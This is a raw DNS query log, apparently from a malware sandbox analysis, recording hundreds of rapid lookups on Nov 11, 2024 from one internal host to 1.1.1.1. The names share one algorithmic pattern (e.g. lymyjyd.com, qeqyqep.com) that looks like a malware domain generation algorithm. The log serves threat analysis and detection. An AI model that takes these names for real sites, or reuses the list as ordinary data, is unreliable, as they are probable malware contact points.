                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596944094 CET192.168.2.81.1.1.10x82d4Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596998930 CET192.168.2.81.1.1.10xa9f2Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597146988 CET192.168.2.81.1.1.10x981cStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597188950 CET192.168.2.81.1.1.10x42e4Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597312927 CET192.168.2.81.1.1.10x7c76Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597387075 CET192.168.2.81.1.1.10x9ceaStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597511053 CET192.168.2.81.1.1.10x3df6Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597553015 CET192.168.2.81.1.1.10x584fStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597701073 CET192.168.2.81.1.1.10x39e4Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597729921 CET192.168.2.81.1.1.10xf744Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597879887 CET192.168.2.81.1.1.10x87adStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597908020 CET192.168.2.81.1.1.10x32a5Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598092079 CET192.168.2.81.1.1.10xf949Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598166943 CET192.168.2.81.1.1.10x2958Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598303080 CET192.168.2.81.1.1.10x6eefStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598450899 CET192.168.2.81.1.1.10xf26fStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598594904 CET192.168.2.81.1.1.10xa13Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598748922 CET192.168.2.81.1.1.10x27d3Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.601948023 CET192.168.2.81.1.1.10x6001Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.620779037 CET192.168.2.81.1.1.10x108fStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.620939970 CET192.168.2.81.1.1.10x64ecStandard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.621402025 CET192.168.2.81.1.1.10xd7ccStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.313173056 CET192.168.2.81.1.1.10x19ccStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.315349102 CET192.168.2.81.1.1.10xcc28Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.318268061 CET192.168.2.81.1.1.10xd5bfStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.319226980 CET192.168.2.81.1.1.10xfbf4Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.323590994 CET192.168.2.81.1.1.10xa6e7Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.323723078 CET192.168.2.81.1.1.10xfb87Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.324466944 CET192.168.2.81.1.1.10xfd85Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325053930 CET192.168.2.81.1.1.10xe823Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325953007 CET192.168.2.81.1.1.10xd8b9Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326107025 CET192.168.2.81.1.1.10x6775Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326531887 CET192.168.2.81.1.1.10x27eaStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326915026 CET192.168.2.81.1.1.10x61a4Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.327419996 CET192.168.2.81.1.1.10xa0c6Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.330673933 CET192.168.2.81.1.1.10xe627Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.331782103 CET192.168.2.81.1.1.10x604Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.332123995 CET192.168.2.81.1.1.10x2353Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.332974911 CET192.168.2.81.1.1.10x7164Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.334126949 CET192.168.2.81.1.1.10xe6cbStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.335298061 CET192.168.2.81.1.1.10xa336Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.339653969 CET192.168.2.81.1.1.10xa4eaStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.341970921 CET192.168.2.81.1.1.10x74eaStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342108011 CET192.168.2.81.1.1.10x18baStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342547894 CET192.168.2.81.1.1.10xf9c9Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357134104 CET192.168.2.81.1.1.10xa12bStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357623100 CET192.168.2.81.1.1.10xff70Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357988119 CET192.168.2.81.1.1.10x64ccStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.358282089 CET192.168.2.81.1.1.10x34e2Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.367165089 CET192.168.2.81.1.1.10x4079Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.375708103 CET192.168.2.81.1.1.10xbd03Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.384934902 CET192.168.2.81.1.1.10xa306Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.386878967 CET192.168.2.81.1.1.10xbf69Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.387396097 CET192.168.2.81.1.1.10x89dcStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.391563892 CET192.168.2.81.1.1.10x9eaeStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.411940098 CET192.168.2.81.1.1.10x6bb5Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.412122965 CET192.168.2.81.1.1.10x63c5Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.412312031 CET192.168.2.81.1.1.10x7105Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.412429094 CET192.168.2.81.1.1.10x81dcStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.412729979 CET192.168.2.81.1.1.10x17c6Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.414424896 CET192.168.2.81.1.1.10x138Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.414582014 CET192.168.2.81.1.1.10x45ebStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.414740086 CET192.168.2.81.1.1.10x9b37Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.415278912 CET192.168.2.81.1.1.10xa01dStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.415715933 CET192.168.2.81.1.1.10x770aStandard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.416033030 CET192.168.2.81.1.1.10xc8c3Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.416846037 CET192.168.2.81.1.1.10x6f51Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.416996002 CET192.168.2.81.1.1.10x23dcStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.417165995 CET192.168.2.81.1.1.10xea63Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.417232037 CET192.168.2.81.1.1.10xe5e1Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.417411089 CET192.168.2.81.1.1.10x7206Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.417604923 CET192.168.2.81.1.1.10x5f94Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.417757034 CET192.168.2.81.1.1.10xa5f1Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.417891979 CET192.168.2.81.1.1.10xdfa7Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.418030024 CET192.168.2.81.1.1.10xcbabStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.418175936 CET192.168.2.81.1.1.10x163Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.418314934 CET192.168.2.81.1.1.10x3f13Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.418713093 CET192.168.2.81.1.1.10x6675Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.419023991 CET192.168.2.81.1.1.10x17edStandard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.419850111 CET192.168.2.81.1.1.10x61d4Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.420020103 CET192.168.2.81.1.1.10x4e76Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.420164108 CET192.168.2.81.1.1.10x45beStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.420324087 CET192.168.2.81.1.1.10x6e86Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.420403957 CET192.168.2.81.1.1.10x73aeStandard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.420476913 CET192.168.2.81.1.1.10xd171Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.420649052 CET192.168.2.81.1.1.10x5b4aStandard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.731090069 CET192.168.2.81.1.1.10xe20aStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.732367992 CET192.168.2.81.1.1.10x6d0Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.732914925 CET192.168.2.81.1.1.10x912Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.733109951 CET192.168.2.81.1.1.10xfbefStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.749538898 CET192.168.2.81.1.1.10x512dStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.759047985 CET192.168.2.81.1.1.10x7890Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.774060965 CET192.168.2.81.1.1.10xbcefStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.780689955 CET192.168.2.81.1.1.10xa12fStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.785180092 CET192.168.2.81.1.1.10xd761Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.786428928 CET192.168.2.81.1.1.10x1f7aStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.787053108 CET192.168.2.81.1.1.10x7635Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.788077116 CET192.168.2.81.1.1.10x509Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.789588928 CET192.168.2.81.1.1.10x9750Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.790026903 CET192.168.2.81.1.1.10xacc9Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.792105913 CET192.168.2.81.1.1.10xf3f2Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.792757034 CET192.168.2.81.1.1.10x6ecbStandard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.793407917 CET192.168.2.81.1.1.10x309bStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.794594049 CET192.168.2.81.1.1.10x346bStandard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.795670986 CET192.168.2.81.1.1.10x849fStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.796113968 CET192.168.2.81.1.1.10x813fStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.798011065 CET192.168.2.81.1.1.10x4d07Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.799616098 CET192.168.2.81.1.1.10x9b51Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.803486109 CET192.168.2.81.1.1.10x8ed1Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.814156055 CET192.168.2.81.1.1.10x798aStandard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.814435959 CET192.168.2.81.1.1.10x5b54Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.814594984 CET192.168.2.81.1.1.10xd85eStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.818206072 CET192.168.2.81.1.1.10x76bStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.818382025 CET192.168.2.81.1.1.10x6383Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.818607092 CET192.168.2.81.1.1.10x8cebStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.819001913 CET192.168.2.81.1.1.10xb2dbStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.819214106 CET192.168.2.81.1.1.10x6de5Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.819361925 CET192.168.2.81.1.1.10xf464Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.819396973 CET192.168.2.81.1.1.10xb2a3Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.819993019 CET192.168.2.81.1.1.10x305dStandard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.820322990 CET192.168.2.81.1.1.10x1cb5Standard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.820513964 CET192.168.2.81.1.1.10x5d17Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.820667982 CET192.168.2.81.1.1.10x641dStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.820843935 CET192.168.2.81.1.1.10x8aa5Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.828222990 CET192.168.2.81.1.1.10xe1a1Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.829886913 CET192.168.2.81.1.1.10xc57Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.830075026 CET192.168.2.81.1.1.10x8e96Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.831692934 CET192.168.2.81.1.1.10x804bStandard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.832015038 CET192.168.2.81.1.1.10xb0a3Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.832068920 CET192.168.2.81.1.1.10xeb55Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.837379932 CET192.168.2.81.1.1.10x3c6eStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.837553978 CET192.168.2.81.1.1.10xf2a8Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.844995975 CET192.168.2.81.1.1.10xf6d5Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.845179081 CET192.168.2.81.1.1.10x12e3Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.845864058 CET192.168.2.81.1.1.10xf542Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.847004890 CET192.168.2.81.1.1.10x616dStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.847201109 CET192.168.2.81.1.1.10x9f12Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.847387075 CET192.168.2.81.1.1.10x7e12Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.847387075 CET192.168.2.81.1.1.10x6235Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.847671986 CET192.168.2.81.1.1.10x7536Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848109961 CET192.168.2.81.1.1.10x2e9eStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848109961 CET192.168.2.81.1.1.10x8569Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848109961 CET192.168.2.81.1.1.10xd24bStandard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848176956 CET192.168.2.81.1.1.10xe8e1Standard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848297119 CET192.168.2.81.1.1.10x96afStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848325968 CET192.168.2.81.1.1.10x79d9Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848479986 CET192.168.2.81.1.1.10x4e79Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.848751068 CET192.168.2.81.1.1.10x7459Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.849576950 CET192.168.2.81.1.1.10xbc8cStandard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:11.850966930 CET192.168.2.81.1.1.10xaf11Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.440857887 CET192.168.2.81.1.1.10xfd5Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.445991039 CET192.168.2.81.1.1.10x3689Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.455630064 CET192.168.2.81.1.1.10x1784Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.455862999 CET192.168.2.81.1.1.10xb9deStandard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.455985069 CET192.168.2.81.1.1.10x4405Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.464762926 CET192.168.2.81.1.1.10x637aStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.477777004 CET192.168.2.81.1.1.10xf864Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.489500999 CET192.168.2.81.1.1.10x93c8Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.490540981 CET192.168.2.81.1.1.10xcee3Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.503654003 CET192.168.2.81.1.1.10xa5c6Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.504512072 CET192.168.2.81.1.1.10x1898Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.521102905 CET192.168.2.81.1.1.10x249aStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.531017065 CET192.168.2.81.1.1.10x4adStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.536715984 CET192.168.2.81.1.1.10x55beStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.539868116 CET192.168.2.81.1.1.10x65dfStandard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.540797949 CET192.168.2.81.1.1.10xcadbStandard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.543358088 CET192.168.2.81.1.1.10xab48Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.550915003 CET192.168.2.81.1.1.10x8fceStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.554718018 CET192.168.2.81.1.1.10x1c6fStandard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.561038017 CET192.168.2.81.1.1.10xe236Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.562174082 CET192.168.2.81.1.1.10xddadStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.565907955 CET192.168.2.81.1.1.10x9d79Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.568236113 CET192.168.2.81.1.1.10x5784Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.568767071 CET192.168.2.81.1.1.10x6cfbStandard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.587856054 CET192.168.2.81.1.1.10xeb3fStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.589540005 CET192.168.2.81.1.1.10x4ab5Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.630445957 CET192.168.2.81.1.1.10xb264Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.631356001 CET192.168.2.81.1.1.10x76e2Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.631755114 CET192.168.2.81.1.1.10xc669Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.631978035 CET192.168.2.81.1.1.10x9d02Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.632653952 CET192.168.2.81.1.1.10xb74bStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.635571957 CET192.168.2.81.1.1.10x1dadStandard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.635803938 CET192.168.2.81.1.1.10xcc47Standard query (0)gadynub.comA (IP address)IN (0x0001)false
